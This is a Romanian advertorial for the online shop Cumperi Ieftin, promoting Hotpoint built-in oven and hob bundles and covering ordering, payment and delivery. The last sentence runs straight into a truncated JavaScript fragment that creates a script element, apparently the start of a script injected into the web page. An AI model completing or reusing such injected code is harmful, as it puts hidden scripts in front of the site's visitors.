FT 850.1 (AN)+PC 640 T (AN) R-500x500Luna cadourilor, Decembrie, se apropie cu pasi rapizi. Este acea perioada din an cand bucataria este utilizata in mod intens pentru prepararea bucatelor traditionale, a prajiturilor si a altor delicatese pentru familie si prieteni dragi. Vechiul dumneavoastra aragaz da semne de imbatranire si doriti sa achizitionati un aparat electrocasnic nou si mult mai potrivit nevoilor dumneavoastra culinare? Doriti sa faceti o modificare in ceea ce priveste aspectul bucatariei, atat la nivel de mobilier sau design iar planul dumneavoastra include si schimbarea aparaturii electrocasnice? O solutie optima la toate aceste intrebari va este oferita de magazinul online Cumperi Ieftin, care va propune spre achizitie pachete incorporabile Hotpoint, la un pret avantajos.

De ce sa alegem pachete incorporabile Hotpoint, in pofida celor clasice?

Aparatele electrocasnice incorporabile, fie ca vorbim aici de cuptor clasic, plita, hota, masina de spalat vase sau rufe, respectiv cuptor cu microunde sunt echipamente realizate intr-o maniera potrivita pentru a putea fi incluse in anumite piese de mobilier existente intr-o bucatarie: dulapuri, in cazul hotelor sau mobilier special realizat pentru a include daca spatiul din bucatarie permite, masina de spalat vase, cuptorul sau plita. Astfel se reduce spatiul utilizat, iar acele zone libere ramase datorita folosirii aparaturii electrocasnice standard poate fi folosita acum la capacitate maxima: zona pentru gatit, pentru pregatit mancarea, si chiar pentru servirea mesei zilnice, dupa caz.

Cumperi Ieftin este o platforma online detinuta de catre firma Prodomo Services, avand sediul in Bucuresti, sector 2. Infiintata initial in anul 1998, dupa o lunga activitate in domeniul comertului a fost lansat in anul 2011, site-ul www.cumperiieftin.ro. Principalul domeniu de activitate este comercializarea aparaturii electrice, electrocasnice, a telefoanelor mobile sau a calculatoarelor, toate la preturi accesibile oricarei persoane. Pe pagina oficiala cumperiieftin.ro, puteti gasi in functie de categoria aleasa: electrocasnice mici, electrocasnice mari, home confort si aer conditionat, televizoare, audio-video-foto,  telefoane si tablete, computere si periferice sau jocuri si console, variante din care puteti face cea mai buna alegere. Printre acestea, gasim si pachete incorporabile Hotpoint, la rubrica in cadrul rubricii online “Electronice mari” .

Oferta  include momentan doar un singur pachet promotional, si anume cuptor electric + plita pe gaz produse de firma Hotpoint Ariston. Pentru fiecare element in parte, puteti gasi pe pagina cumperiieftin.ro informatii detaliate privind modul de functionare a acestora, functiile detinute de cuptorul electric si multe altele.

Pachete incorporabile Hotpoint – solutia potrivita nevoilor dumneavoastra culinare.

Daca doriti sa comandati pachete incorporabile Hotpoint, puteti folosi ca principale mijloace optiunea “Comanda rapida”, aflata in dreptul fiecarui produs, folosind aplicatia “Cos de cumparaturi”, existenta pe site-ul cumperiieftin.ro, sau puteti realiza o comanda telefonica. Ca modalitate de plata, aceasta are loc in momentul livrarii, sau in avans prin ordin de plata. Plata cu cardul se accepta doar la sediul din str. Agricultori, nr. 18, sector 2, Bucuresti sau la dorinta  clientului, doar pentru livrari in Bucuresti. Asiguram livrarea produselor in toata tara, iar transportul pentru comenzi in Bucuresti este gratuit. Pentru mai multe detalii privind oferta actuala ce cuprinde printre altele si pachete incorporabile Hotpoint, puteti accesa pagina cumperiieftin.ro, ne puteti contacta telefonic, prin mail sau va asteptam direct la sediul  din Bucuresti, sector 2. Alegeti cu incredere pachete incorporabile Hotpoint oferite de compania Prodomo Services. Nicicand gatitul nu a fost mai placut ca acum!var d=document;var s=d.createElement(‘script’);